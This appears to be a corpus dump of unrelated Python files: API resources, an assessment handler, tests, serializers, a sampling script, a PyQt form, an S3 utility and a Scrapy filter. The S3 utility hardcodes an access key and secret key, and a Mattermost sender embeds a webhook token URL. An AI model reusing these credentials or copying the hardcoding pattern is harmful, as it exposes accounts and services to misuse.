env = Environment.objects.get(pk=data.get("environment"))
run = data.pop("run_id")
except KeyError as e:
raise ValidationError(
"bad result object data missing key: {0}".format(e))
except Environment.DoesNotExist as e:
raise ValidationError(
"Specified environment does not exist: {0}".format(e))
data["environment"] = env
try:
rcv = RunCaseVersion.objects.get(
run__id=run,
caseversion__case__id=case,
environments=env,
)
except RunCaseVersion.DoesNotExist as e:
raise ValidationError(
"RunCaseVersion not found for run: {0}, case: {1}, environment: {2}:\nError {3}".format(
str(run), str(case), str(env), e))
data["user"] = request.user
bundle.obj = rcv.get_result_method(status)(**data)
return bundle
class RunSuiteResource(MTResource):
"""
Create, Read, Update and Delete capabilities for RunSuite.
Filterable by suite and run fields.
"""
run = fields.ForeignKey(RunResource, 'run')
suite = fields.ForeignKey(SuiteResource, 'suite')
class Meta(MTResource.Meta):
queryset = RunSuite.objects.all()
fields = ["suite", "run", "order", "id"]
filtering = {
"suite": ALL_WITH_RELATIONS,
"run": ALL_WITH_RELATIONS
}
authorization = RunSuiteAuthorization()
@property
def model(self):
return RunSuite
@property
def read_create_fields(self):
"""run and suite are read-only"""
return ["suite", "run"]
def hydrate_suite(self, bundle):
"""suite is read-only on PUT
suite.product must match run.productversion.product on CREATE
"""
# CREATE
if bundle.request.META['REQUEST_METHOD'] == 'POST':
suite_id = self._id_from_uri(bundle.data['suite'])
suite = Suite.objects.get(id=suite_id)
run_id = self._id_from_uri(bundle.data['run'])
run = Run.objects.get(id=run_id)
if suite.product.id != run.productversion.product.id:
error_message = str(
"suite's product must match run's product."
)
logger.error(
"\n".join([error_message, "suite prod: %s, run prod: %s"]),
suite.product.id, run.productversion.product.id)
raise ImmediateHttpResponse(
response=http.HttpBadRequest(error_message))
return bundle
class SuiteSelectionResource(BaseSelectionResource):
"""
Specialty end-point for an AJAX call from the multi-select widget
for selecting suites.
"""
product = fields.ForeignKey(ProductResource, "product")
runs = fields.ToManyField(RunResource, "runs")
created_by = fields.ForeignKey(
UserResource, "created_by", full=True, null=True)
class Meta:
queryset = Suite.objects.all().select_related(
"created_by",
).annotate(case_count=Count("cases"))
list_allowed_methods = ['get']
fields = ["id", "name", "created_by"]
filtering = {
"product": ALL_WITH_RELATIONS,
"runs": ALL_WITH_RELATIONS,
"created_by": ALL_WITH_RELATIONS,
}
ordering = ["runs"]
def dehydrate(self, bundle):
"""Add some convenience fields to the return JSON."""
suite = bundle.obj
bundle.data["suite_id"] = unicode(suite.id)
bundle.data["case_count"] = suite.case_count
bundle.data["filter_cases"] = filter_url("manage_cases", suite)
return bundle
| python |
"""
Copyright 2017 Balwinder Sodhi
Licenced under MIT Licence as available here:
https://opensource.org/licenses/MIT
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
Created on Mar 3, 2017
@author: Balwinder Sodhi
"""
from common import *
from entities import *
import logging
class AssessmentHandler(BaseHandler):
def getAssessmentsTakenByUser(self):
ua_list = AssessmentSubmissionDto.query(AssessmentSubmissionDto.submittedBy
== self.get_current_user_key()).fetch()
data = [{"submissionId": x.key.id(), "submittedOn": x.submittedOn,
"draft": x.draft} for x in ua_list]
self.send_json_response(Const.STATUS_OK, data)
def getPortfolio(self):
a = [p.to_dict_with_id("assessId") for p in
AssessmentDto.query(AssessmentDto.owner == self.get_current_user_key()).fetch()]
q = [p.to_dict_with_id("questionId") for p in
QuestionDto.query(QuestionDto.owner == self.get_current_user_key()).fetch()]
t = [p.to_dict_with_id("trailId") for p in
TrailDto.query(TrailDto.owner == self.get_current_user_key()).fetch()]
p = dict()
p['trails'] = t
p['authoredAssessments'] = a
p['questionBank'] = q
p['content'] = [] # TODO Remove
self.send_json_response(Const.STATUS_OK, p)
def getQuestion(self):
q_id = self.request.params["qid"]
q = QuestionDto.get_by_id(long(q_id))
if q:
self.send_json_response(Const.STATUS_OK, q.to_dict_with_id("questionId"))
else:
self.send_json_response(Const.STATUS_ERROR, "Could not find the requested information.")
def saveQuestion(self):
qf = json.loads(self.request.body)
qid = qf.get("questionId")
if qid:
q = QuestionDto.get_by_id(int(qid))
if q.owner == self.get_current_user_key():
q.populate_from_dict(qf)
q.put()
else:
raise ValueError("Cannot save entity not owned by this user.")
else:
q = QuestionDto(owner=self.get_current_user_key())
q.populate_from_dict(qf)
q.put()
self.send_json_response(Const.STATUS_OK, q.to_dict_with_id("questionId"))
def getAssessmentSubmission(self, sub_key=None):
if sub_key:
asub = sub_key.get()
sid = asub.key.id()
else:
sid = self.request.params["id"]
asub = AssessmentSubmissionDto.get_by_id(long(sid))
if asub:
ta = asub.traiAssessment.get()
else:
raise ValueError("Submission record not found.", sid)
# Fetch the assessment
a_dict = self._fetch_assessment(ta.assess.id(), True)
# Mark the selected answers in assessment as per saved submission
if a_dict:
a_dict["submissionId"] = sid
max_points = 0
for q_dict in a_dict["questions"]:
max_points += q_dict["points"]
# One question may have one or more selected responses
res_list = [x for x in asub.responses if x.questionId.id() == q_dict["questionId"]]
for res in res_list:
# Expected only one match here
if q_dict['type'] != 'FTXT':
aopt_dict = [x_dict for x_dict in q_dict['answerOptions']
if x_dict['answer'] == res.answer]
if aopt_dict: aopt_dict[0]["marked"] = True
else:
# Free text answers have a single answerOptions object
q_dict['answerOptions'][0]['response'] = res.answer
# Include the score
a_dict["score"] = str(asub.score)
a_dict["maxPoints"] = max_points
a_dict["draft"] = asub.draft
self.send_json_response(Const.STATUS_OK, a_dict)
else:
self.send_json_response(Const.STATUS_ERROR, "Record not found!")
def getAssessmentForTaking(self):
if "id" not in self.request.params:
self.send_json_response(Const.STATUS_ERROR, "Missing required params.")
return
a_id = self.request.params["id"]
# First check for an existing in-progress submission
ta = TrailAssessmentDto.query(TrailAssessmentDto.assess ==
ndb.Key(AssessmentDto, long(a_id))).fetch(keys_only=True)
if ta:
sub_keys = AssessmentSubmissionDto.query(
AssessmentSubmissionDto.traiAssessment == ta[0],
AssessmentSubmissionDto.submittedBy == self.get_current_user_key()
).fetch(keys_only=True)
# Found an existing submission
if sub_keys:
logging.info(">>>>>> Found existing submission. ID: %s", sub_keys)
# self.redirect("/#/EditSubmission/%d" % sub_keys[0].id())
self.getAssessmentSubmission(sub_keys[0])
else:
logging.info(">>>>>> Did not find any existing submission. ID: %s", ta)
self.getAssessment(for_taking=True)
def saveAssessmentResponse(self):
ar_dict = self.load_json_request()
# Fix the key properties
for r in ar_dict["responses"]:
r["questionId"] = ndb.Key(QuestionDto, long(r["questionId"]))
if "submissionId" in ar_dict:
sub = AssessmentSubmissionDto.get_by_id(long(ar_dict["submissionId"]))
else:
aid = ar_dict["assessId"]
ta_list = TrailAssessmentDto.query().\
filter(TrailAssessmentDto.assess ==
ndb.Key(AssessmentDto, long(aid))
).fetch(keys_only=True)
if not ta_list:
raise ValueError("Trail assessment record not found for assessment ID %s" % aid)
sub = AssessmentSubmissionDto(traiAssessment = ta_list[0])
sub.populate_from_dict(ar_dict)
sub.submittedBy = self.get_current_user_key()
sub.put()
self.send_json_response(Const.STATUS_OK, sub.to_dict_with_id("submissionId"))
def getAssessmentResult(self):
sid = self.request.params["id"]
sub = AssessmentSubmissionDto.get_by_id(long(sid))
if sub:
# if not sub.draft:
# self.send_json_response(Const.STATUS_ERROR, "Already submitted!")
# return
sub.draft = False
# Calculate score
ta = sub.traiAssessment.get()
res_list = sub.responses
asmt = ta.assess.get()
aq_list = AssessmentQuestionDto.query(
AssessmentQuestionDto.assess == ta.assess).fetch()
# Reset the score
sub.score = 0
for aq in aq_list:
q = aq.assessQtn.get()
# Expected correct answers list
ca_list = [ao.answer for ao in q.answerOptions if ao.correct]
# Submitted answers list
qr_list = [r.answer for r in res_list if r.questionId == aq.assessQtn]
if ca_list == qr_list:
sub.score += aq.points
else:
sub.score += asmt.pointsForWrongAns
# Persist in datastore
sub_key = sub.put()
self.getAssessmentSubmission(sub_key=sub_key)
else:
self.send_json_response(Const.STATUS_ERROR, "Data not found.")
def getAssessment(self, for_taking=False):
aid = self.request.params["id"]
a_dict = self._fetch_assessment(aid, for_taking)
if a_dict:
self.send_json_response(Const.STATUS_OK, a_dict)
else:
self.send_json_response(Const.STATUS_ERROR, "Could not find the requested information.")
def _fetch_assessment(self, aid, for_taking):
a = AssessmentDto.get_by_id(long(aid))
if a:
a_dict = a.to_dict_with_id("assessId")
aq_list = AssessmentQuestionDto.query(
AssessmentQuestionDto.assess == a.key).fetch()
if aq_list:
q_pts = {}
keys = []
for aq in aq_list:
q_pts[aq.assessQtn.id()] = aq.points
keys.append(ndb.Key(QuestionDto, aq.assessQtn.id()))
q_list = ndb.get_multi(keys)
qdict_list = [x.to_dict_with_id("questionId") for x in q_list]
for q in qdict_list:
q["points"] = q_pts[q["questionId"]]
a_dict["questions"] = qdict_list
# Clear the correct flags on answers
if for_taking:
for qd in a_dict["questions"]:
for ao in qd['answerOptions']:
ao['correct'] = None
if qd['type'] == 'FTXT':
ao['answer'] = None
return a_dict
def lookupAssessments(self):
# TODO: Minimize information to be sent
qry = self.request.params["q"]
a_list = AssessmentDto.query(AssessmentDto.owner == self.get_current_user_key()).fetch()
f = [a.to_dict_with_id("assessId") for a in a_list if qry.lower() in a.title.lower()]
self.send_json_response(Const.STATUS_OK, f)
def saveAssessment(self):
asmt = self.load_json_request()
if "assessId" in asmt:
a = AssessmentDto.get_by_id(int(asmt["assessId"]))
logging.debug("Loaded assessment from DB.")
else:
a = AssessmentDto()
logging.debug("Creating new assessment.")
a.populate_from_dict(asmt)
a.owner = self.get_current_user_key()
a_key = a.put()
aq_list = AssessmentQuestionDto.query(
AssessmentQuestionDto.assess == a_key).fetch()
if aq_list:
ndb.delete_multi([x.key for x in aq_list])
logging.debug("Cleared old AQs.")
for aq in asmt["questions"]:
q = AssessmentQuestionDto()
q.assessQtn = ndb.Key(QuestionDto, aq["questionId"])
q.assess = a_key
q.points = aq["points"]
q.put()
a_dict = a.to_dict_with_id("assessId")
a_dict["questions"] = asmt["questions"]
self.send_json_response(Const.STATUS_OK, a_dict)
| python |
#
# Sample: Gamut clamping
#
from lcms import *
Lab = cmsCIELab(80, -200, 50)
print "Original", Lab
#
# Desaturates color to bring it into gamut.
# The gamut boundaries are specified as:
# -120 <= a <= 120
# -130 <= b <= 130
cmsClampLab(Lab, 120, -120, 130, -130)
print "Constrained", Lab
| python |
from django.urls import path
from . import views
urlpatterns = [
path("numbers", views.NumberListView.as_view(), name="number_list_view"),
path("numbers/<int:pk>/", views.NumberView.as_view(), name="number_view"),
path("numbers/add_number/", views.NumberEditView.as_view(), name="add_number"),
path('numbers/import_numbers/', views.NumberBulkImportView.as_view(), name='import_numbers'),
path("numbers/<int:pk>/edit/", views.NumberEditView.as_view(), name="number_edit"),
path("numbers/number_bulk_edit", views.NumberBulkEditView.as_view(), name="number_bulk_edit"),
path("numbers/<int:pk>/delete/", views.NumberDeleteView.as_view(), name="number_delete"),
path("numbers/number_bulk_delete", views.NumberBulkDeleteView.as_view(), name="number_bulk_delete"),
path("trunks", views.TrunkListView.as_view(), name="trunk_list_view"),
path("trunks/<int:pk>/", views.TrunkView.as_view(), name="trunk_view"),
path("trunks/add_trunk/", views.TrunkEditView.as_view(), name="add_trunk"),
path('trunks/import_trunks/', views.TrunkBulkImportView.as_view(), name='import_trunks'),
path("trunks/<int:pk>/edit/", views.TrunkEditView.as_view(), name="trunk_edit"),
path("trunks/trunk_bulk_edit", views.TrunkBulkEditView.as_view(), name="trunk_bulk_edit"),
path("trunks/<int:pk>/delete/", views.TrunkDeleteView.as_view(), name="trunk_delete"),
path("trunks/trunk_bulk_delete", views.TrunkBulkDeleteView.as_view(), name="trunk_bulk_delete"),
path("UCClusters", views.UCClusterListView.as_view(), name="uccluster_list_view"),
path("UCClusters/<int:pk>/", views.UCClusterView.as_view(), name="uccluster_view"),
path("UCClusters/add_uccluster/", views.UCClusterEditView.as_view(), name="add_uccluster"),
path('UCClusters/import_ucclusters/', views.UCClusterBulkImportView.as_view(), name='import_ucclusters'),
path("UCClusters/<int:pk>/edit/", views.UCClusterEditView.as_view(), name="uccluster_edit"),
path("UCClusters/uccluster_bulk_edit", views.UCClusterBulkEditView.as_view(), name="uccluster_bulk_edit"),
path("UCClusters/<int:pk>/delete/", views.UCClusterDeleteView.as_view(), name="uccluster_delete"),
path("UCClusters/uccluster_bulk_delete", views.UCClusterBulkDeleteView.as_view(), name="uccluster_bulk_delete"),
path("devicepools", views.DevicePoolListView.as_view(), name="devicepool_list_view"),
path("devicepools/<int:pk>/", views.DevicePoolView.as_view(), name="devicepool_view"),
path("devicepools/add_devicepool/", views.DevicePoolEditView.as_view(), name="add_devicepool"),
path('devicepools/import_devicepools/', views.DevicePoolBulkImportView.as_view(), name='import_devicepools'),
path("devicepools/<int:pk>/edit/", views.DevicePoolEditView.as_view(), name="devicepool_edit"),
path("devicepools/devicepool_bulk_edit", views.DevicePoolBulkEditView.as_view(), name="devicepool_bulk_edit"),
path("devicepools/<int:pk>/delete/", views.DevicePoolDeleteView.as_view(), name="devicepool_delete"),
path("devicepools/devicepool_bulk_delete", views.DevicePoolBulkDeleteView.as_view(), name="devicepool_bulk_delete"),
]
| python |
import re
import pytest
from ratus import Evaluator, __version__
from ratus.execer import Executor, ExecutorError
from ratus.parse import (
BinaryOp,
BinaryOpType,
Float,
Function,
Integer,
Parser,
ParserError,
String,
UnaryOp,
UnaryOpType,
)
from ratus.token import Token, Tokeniser, TokenLiteral, TokenType
def test_version():
assert __version__ == "0.0.1"
@pytest.mark.parametrize(
("source", "expected", "injected_functions"),
(
pytest.param("1 + 1", 2, None, id="addition"),
pytest.param("1 - 1", 0, None, id="subtraction"),
pytest.param("1 + 3 * 2", 7, None, id="precedence"),
pytest.param("2.0", 2.0, None, id="float_literal"),
pytest.param('"test"', "test", None, id="string_literal"),
pytest.param("if(1 > 2, 10, 5)", 5, None, id="false_conditional"),
pytest.param("if(1<2, 10, 5)", 10, None, id="true_conditional"),
pytest.param("if(if(1<2, 0, 1), 10, 5)", 5, None, id="nested_conditional"),
pytest.param("2 + 3 * 2", 8, None, id="bodmas"),
pytest.param("3 * 2 + 2", 8, None, id="computation_ordering"),
pytest.param("1 > 2", False, None, id="greater_than"),
pytest.param("1 = 1", True, None, id="equals"),
pytest.param("1 != 2", True, None, id="not_equals"),
pytest.param(
"lookup(12345, 'PG')",
10,
{"lookup": lambda x, y: 10},
id="injected_function",
),
pytest.param(
"if(lookup(12345, 'PG') = 10, 5, 4)",
5,
{"lookup": lambda x, y: 10},
id="injected_function_in_conditional",
),
pytest.param(
"add(1, 2)",
3,
{"add": lambda x, y: x + y},
id="function_call_in_computation",
),
),
)
def test_eval(source, expected, injected_functions):
evaluator = Evaluator(injected_functions)
assert evaluator.evaluate(source) == expected
@pytest.mark.parametrize(
("source", "injected_functions", "error_msg"),
(("test(1, 2)", None, "Function 'test' is not defined"),),
)
def test_eval_error(source, injected_functions, error_msg):
evaluator = Evaluator(injected_functions)
with pytest.raises(ExecutorError, match=error_msg):
evaluator.evaluate(source)
| python |
from hilbert import main
main()
| python |
from rest_framework import serializers
from attendance.models import Attendance, AttendanceBlock, Session
class SessionSerializer(serializers.ModelSerializer):
subject = serializers.SerializerMethodField()
class Meta:
model = Session
fields = [
"subject",
"start",
"end",
"did_attend",
]
def get_subject(self, obj):
return obj.subject.name
class AttendanceSerializer(serializers.ModelSerializer):
sessions = SessionSerializer(many=True)
class Meta:
model = Attendance
fields = [
"date",
"present",
"absent",
"total",
"sessions",
]
def get_subject(self, obj):
return obj.subject.name
class AttendanceBlockSerializer(serializers.ModelSerializer):
attendance = AttendanceSerializer(many=True)
semester = serializers.SerializerMethodField()
class Meta:
model = AttendanceBlock
fields = [
"semester",
"link",
"total",
"present",
"absent",
"percent",
"updated_at",
"attendance",
]
def get_semester(self, obj):
return obj.semester.semester
| python |
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
import scipy.optimize as opt
import scipy.stats as st
from math import exp, copysign, log, sqrt, pi
import sys
sys.path.append('..')
from rto_l1 import *
# ground truth parameter
thetatruth = np.array([0.5, 1.0, 0, 0.1, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
N_modes = int((len(thetatruth)-1)/2)
# weight functions to penalize high Fourier modes
#weights_cos = np.ones((N_modes,)) # no penalization
weights_cos = 1/np.arange(1, N_modes+1)
#weights_sin = np.ones((N_modes,)) # no penalization
weights_sin = 1/np.arange(1, N_modes+1)
# forward function and Jacobian
def f_fnc(theta, xs):
N_modes = int((len(theta)-1)/2)
temp = theta[0]
for k in range(N_modes):
temp += theta[k+1] * weights_cos[k]*np.cos((k+1)*xs)
for k in range(N_modes):
temp += theta[k+N_modes+1] * weights_sin[k]*np.sin((k+1)*xs)
return temp
def Jf_fnc(theta, xs):
N_modes = int((len(theta)-1)/2)
temp = np.zeros((len(xs),2*N_modes+1))
temp[:, 0] = np.ones((len(xs),))
for k in range(N_modes):
temp[:,k+1] = weights_cos[k]*np.cos((k+1)*xs)
for k in range(N_modes):
temp[:, k+N_modes+1] = weights_sin[k]*np.sin((k+1)*xs)
return temp
# observation positions
xObs = np.concatenate((np.array([0, 0.2, 0.8, pi/2, 1.7, 1.8, 2.4, pi]), np.random.uniform(2, 3, (20,))), axis=0)
N = len(xObs)
# forward function for fixed observation positions
def f(theta):
return f_fnc(theta, xObs)
def Jf(theta):
return Jf_fnc(theta, xObs)
# observational noise standard deviation
sigma = 0.05
# generate data
y = f_fnc(thetatruth, xObs) + np.random.normal(0, sigma, (len(xObs),))
# Laplace prior scale gamma (std = sqrt(2)*gamma)
gamma = 0.1
lam = 1/gamma
def cost(theta, y_aug):
r = resf(theta, y_aug)
return 0.5*np.dot(r.T, r)
# starting point for optimization
u0 = np.random.normal(0, gamma, thetatruth.shape)
# RTO sampling
N_samples = 100
lambdas = lam*np.ones((2*N_modes+1,))
res = rto_l1(f, Jf, y, sigma, lambdas, u0, N_samples)
# extract data
samples_plain = res["samples_plain"]
samples_corrected = res["samples_corrected"]
thetaMAP = res["thetaMAP"]
#plot results
xx = np.arange(0, pi, 0.01)
yy = f_fnc(thetatruth, xx)
plt.figure(1); plt.clf();plt.ion()
for n in range(17):
plt.plot(xx, f_fnc(samples_corrected[np.random.randint(N_samples), :], xx), '0.8')
plt.plot(xx, f_fnc(thetaMAP, xx), 'k')
plt.plot(xx, f_fnc(thetatruth, xx), 'g')
plt.plot(xx, yy, 'g')
plt.plot(xObs, y, 'r.', markersize=10)
for n, pos in enumerate(xObs):
plt.plot(np.array([pos, pos]), np.array([y[n]-2*sigma, y[n]+2*sigma]), 'r', linewidth=2)
plt.figure(2);plt.clf()
for n in range(17):
plt.plot(samples_corrected[np.random.randint(N_samples), :], '0.8', marker=".")
plt.plot(thetaMAP.flatten(), '.k-')
plt.plot(thetatruth.flatten(), '.g-')
plt.show()
"""np.random.seed(1992)
xs_obs = np.concatenate((np.array([0, 0.2, 0.8, pi/2, 1.7, 1.8, 2.4, pi]), np.random.uniform(4, 2*pi, (30,))), axis=0)
N = len(xs_obs)
sigma = 0.2
thetaTruth = np.array([0.5, 1.0, 0, 0.1, 0, 0, 0, 0, -0.3, 0, 0, 0, 0, 0, 0])
N_modes = int((len(thetaTruth)-1)/2)
coeffs_cos = 1/np.arange(1, N_modes+1)#np.ones((N_modes,))
coeffs_sin = 1/np.arange(1, N_modes+1)#np.ones((N_modes,))
def f_fnc(theta, xs):
temp = theta[0]
N_modes = int((len(theta)-1)/2)
for k in range(N_modes):
temp += theta[k+1] * coeffs_cos[k]*np.cos((k+1)*xs)
for k in range(N_modes):
temp += theta[k+N_modes+1] * coeffs_sin[k]*np.sin((k+1)*xs)
return temp
def Jf_fnc(theta, xs):
temp = np.zeros((len(xs),2*N_modes+1))
temp[:, 0] = np.ones((len(xs),))
for k in range(N_modes):
temp[:, k+1] = coeffs_cos[k]*np.cos((k+1)*xs)
for k in range(N_modes):
temp[:, k+N_modes+1] = coeffs_sin[k]*np.sin((k+1)*xs)
return temp
# variants with fixed x in observation points
f = lambda theta: f_fnc(theta, xs_obs)
Jf = lambda theta: Jf_fnc(theta, xs_obs)
xx = np.arange(0, 2*pi, 0.01)
yy = f_fnc(thetaTruth, xx)
y = f_fnc(thetaTruth, xs_obs) + np.random.normal(0, sigma, (len(xs_obs),))
lam = 3
def norm1(theta, lam_val):
return lam_val*np.sum(np.abs(theta))
def FncL1(theta, y, lam_val):
return Misfit(theta, y) + norm1(theta, lam_val)
N_iter = 300
tau = 0.002
val = np.zeros((N_iter,))
thetaOpt = np.zeros((2*N_modes+1,))
# find MAP estimator
misfit = lambda theta: f(theta)-y
def Phi_fnc(theta):
m = misfit(theta)
return 1/(2*sigma**2)*np.dot(m.T, m)
def DPhi_fnc(theta):
return np.dot(Jf(theta).T, misfit(theta))/sigma**2
I_fnc = lambda theta: Phi_fnc(theta) + norm1(theta, lam)
res = FISTA(thetaOpt, I_fnc, Phi_fnc, DPhi_fnc, 2*sigma**2*lam, alpha0=10, eta=0.5, N_iter=500, c=1.0, showDetails=True)
thetaOpt = np.copy(res["sol"])
plt.figure(2)
plt.title("FISTA")
plt.plot(res["Is"])
lambdas = lam*np.ones((2*N_modes+1,))
u0 = np.zeros((2*N_modes+1,))
N_samples = 250
res_rto = rto_l1(f, Jf, y, sigma, lambdas, u0, N_samples)
thetaMAP, samples = res_rto["thetaMAP"], res_rto["samples_corrected"]
print("thetaTruth: I = " + str(I_fnc(thetaTruth)) + " = " + str(Phi_fnc(thetaTruth)) + " (misfit) + " + str(norm1(thetaTruth, lam)) + " (norm)")
print("thetaMAP(sampling): I = " + str(I_fnc(thetaMAP)) + " = " + str(Phi_fnc(thetaMAP)) + " (misfit) + " + str(norm1(thetaMAP, lam)) + " (norm)")
print("thetaOpt(FISTA): I = " + str(I_fnc(thetaOpt)) + " = " + str(Phi_fnc(thetaOpt)) + " (misfit) + " + str(norm1(thetaOpt, lam)) + " (norm)")
plt.figure(3);
for n in range(17):
plt.plot(samples[np.random.randint(N_samples), :], '0.8', marker=".")
plt.plot(thetaMAP, '.k-', label="th_MAP (from sampling)")
plt.plot(thetaTruth, '.g-', label="th_true")
plt.plot(thetaOpt, '.b-', label="th_OPT (from FISTA)")
plt.legend()
plt.figure(1);plt.ion()
plt.plot(xs_obs, y, 'r.', markersize=10, label="obs")
plt.plot(xx, f_fnc(thetaTruth, xx), 'g', label="th_true")
for n in range(17):
plt.plot(xx, f_fnc(samples[np.random.randint(N_samples), :], xx), '0.8')
plt.plot(xx, f_fnc(thetaMAP, xx), 'k', label="th_MAP (from sampling)")
plt.plot(xx, yy, 'g')
plt.plot(xs_obs, y, 'r.', markersize=10)
plt.plot(xx, f_fnc(thetaOpt, xx), 'b', label="th_OPT (from FISTA)")
plt.legend()
plt.show()
"""
| python |
import requests
import json
def send(text, path):
requests.post('https://meeting.ssafy.com/hooks/k13xxxszfp8z8ewir4qndiw63c',
data=json.dumps({"attachments": [{
"color": "#FF8000",
"text": str(text),
"author_name": "django",
"author_icon": "http://www.mattermost.org/wp-content/uploads/2016/04/icon_WS.png",
"title": path,
}]}),
headers={'Content-Type': 'application/json'}
)
| python |
#-*- coding: utf-8 -*-
import datetime
from PyQt4 import QtGui
from campos import CampoNum, CampoCad
from controllers.orden_controller import initData, translateView, updateData, checkValidacion, Save
class OrdenView(QtGui.QGroupBox):
def __init__(self, parent=None):
super(OrdenView, self).__init__(parent)
self.label_numero = QtGui.QLabel(self)
self.text_numero = CampoNum(self, u"Número de orden")
self.label_fecha = QtGui.QLabel(self)
self.date_fecha = QtGui.QDateEdit(self)
self.label_bien_servicio = QtGui.QLabel(self)
self.text_bien_servicio = CampoNum(self, u"Bien/servicio")
self.label_rubro = QtGui.QLabel(self)
self.text_rubro = CampoCad(self, u"Rubro")
self.fila_orden = QtGui.QHBoxLayout()
self.fila_orden.addWidget(self.label_numero)
self.fila_orden.addWidget(self.text_numero)
self.fila_orden.addWidget(self.label_fecha)
self.fila_orden.addWidget(self.date_fecha)
self.fila_orden.addWidget(self.label_bien_servicio)
self.fila_orden.addWidget(self.text_bien_servicio)
self.fila_orden.addWidget(self.label_rubro)
self.fila_orden.addWidget(self.text_rubro)
self.setLayout(self.fila_orden)
self.translate_view()
init_data = initData
translate_view = translateView
update_data = updateData
check_validacion = checkValidacion
save = Save | python |
#!/usr/bin/env python3
from distutils.core import setup
import os
os.system("make ")
setup(name='pi',
version='1.0',
description='pi digits compute',
author='mathm',
author_email='[email protected]',
url="https://igit.58corp.com/mingtinglai/pi",
)
| python |
import os
import sys
import threading
import boto3
import logging
import shutil
from botocore.client import Config
from matplotlib import pyplot as plt
from botocore.exceptions import ClientError
from boto3.s3.transfer import TransferConfig
END_POINT_URL = 'http://uvo1baooraa1xb575uc.vm.cld.sr/'
A_KEY = 'AKIAtEpiGWUcQIelPRlD1Pi6xQ'
S_KEY = 'YNV6xS8lXnCTGSy1x2vGkmGnmdJbZSapNXaSaRhK'
class ProgressPercentage(object):
def __init__(self, filename):
self._filename = filename
self._size = float(os.path.getsize(filename))
self._seen_so_far = 0
self._lock = threading.Lock()
def __call__(self, bytes_amount):
# To simplify, assume this is hooked up to a single filename
with self._lock:
self._seen_so_far += bytes_amount
percentage = (self._seen_so_far / self._size) * 100
sys.stdout.write("\r%s %s / %s (%.2f%%)" %
(self._filename, self._seen_so_far,
self._size, percentage))
sys.stdout.flush()
"""Functions for buckets operation"""
def create_bucket_op(bucket_name, region):
if region is None:
s3_client.create_bucket(Bucket=bucket_name)
else:
location = {'LocationConstraint': region}
s3_client.create_bucket(Bucket=bucket_name,
CreateBucketConfiguration=location)
def list_bucket_op(bucket_name, region, operation):
buckets = s3_client.list_buckets()
if buckets['Buckets']:
for bucket in buckets['Buckets']:
print(bucket)
return True
else:
logging.error('unknown bucket operation')
return False
def bucket_operation(bucket_name, region=None, operation='list'):
try:
if operation == 'delete':
s3_client.delete_bucket(Bucket=bucket_name)
elif operation == 'create':
create_bucket_op(bucket_name, region)
elif operation == 'list':
return list_bucket_op(bucket_name, region, operation)
else:
logging.error('unknown bucket operation')
return False
except ClientError as e:
logging.error(e)
return False
return True
def upload_download_op_file(bucket_name, file_name, file_location,
region, operation):
if not file_location:
logging.error('The file location %d is missing for %s operation!'
% (file_location, operation))
return False
if operation == 'download':
s3_resource.Bucket(bucket_name).download_file(file_name, file_location)
elif operation == 'upload' and region is None:
s3_resource.Bucket(bucket_name).upload_file(file_location, file_name)
else:
location = {'LocationConstraint': region}
s3_resource.Bucket(bucket_name
).upload_file(file_location, file_name,
CreateBucketConfiguration=location)
return True
"""Functions for files operation"""
def list_op_file(bucket_name):
current_bucket = s3_resource.Bucket(bucket_name)
print('The files in bucket %s:\n' % (bucket_name))
for obj in current_bucket.objects.all():
print(obj.meta.data)
return True
def delete_op_file(bucket_name, file_name, operation):
if not file_name:
logging.error('The file name %s is missing for%s operation!'
% (file_name, operation))
return False
s3_client.delete_object(Bucket=bucket_name, Key=file_name)
return True
def file_operation(bucket_name=None, file_name=None, file_location=None,
region=None, operation='list'):
if not bucket_name:
logging.error('The bucket name is %s missing!' % (bucket_name))
return False
try:
if operation == 'list':
return list_op_file(bucket_name)
elif operation == 'delete':
return delete_op_file(bucket_name, file_name, operation)
elif operation == 'upload' or operation == 'download':
return upload_download_op_file(bucket_name, file_name,
file_location, region, operation)
else:
logging.error('unknown file operation')
return False
except ClientError as e:
logging.error(e)
return False
return True
s3_resource = boto3.resource('s3', endpoint_url=END_POINT_URL,
aws_access_key_id=A_KEY,
aws_secret_access_key=S_KEY,
config=Config(signature_version='s3v4'),
region_name='US')
s3_client = boto3.client('s3', endpoint_url=END_POINT_URL,
aws_access_key_id=A_KEY,
aws_secret_access_key=S_KEY,
config=Config(signature_version='s3v4'),
region_name='US')
bucket_name = 'detection'
file_name = r'0_5.txt'
# path_file_upload = r'C:\PycharmProjects\cortxHackton\upload\0_5.txt'
# assert os.path.isfile(path_file_upload)
# with open(path_file_upload, "r") as f:
# pass
path_file_download = r'download\0_5.txt'
path_save = ''
if bucket_operation(bucket_name, None, 'list'):
print("Bucket creation completed successfully!")
#
# if file_operation(bucket_name, file_name, path_file_upload, None, 'upload'):
# print("Uploading file to S3 completed successfully!")
if file_operation(bucket_name, file_name, path_file_download, None, 'download'):
print("Downloading the file to S3 has been completed successfully!")
# if file_operation(bucket_name, file_name, path_file_download, None, 'delete'):
# print("Downloading the file to S3 has been completed successfully!")
# zip_point = ''
# shutil.make_archive(zip_point, 'zip', path_save)
# if file_operation(bucket_name, '.json', path_save + '.json', None, 'upload'):
# print("Uploading file to S3 completed successfully!")
| python |
#coding:utf-8
import hashlib
from scrapy.dupefilters import RFPDupeFilter
from scrapy.utils.url import canonicalize_url
class URLSha1Filter(RFPDupeFilter):
"""根据urlsha1过滤"""
def __init__(self, path=None, debug=False):
self.urls_seen = set()
RFPDupeFilter.__init__(self, path)
def request_seen(self, request):
fp = hashlib.sha1()
fp.update(canonicalize_url(request.url))
url_sha1 = fp.hexdigest()
if url_sha1 in self.urls_seen:
return True
else:
self.urls_seen.add(url_sha1) | python |
from sys import *
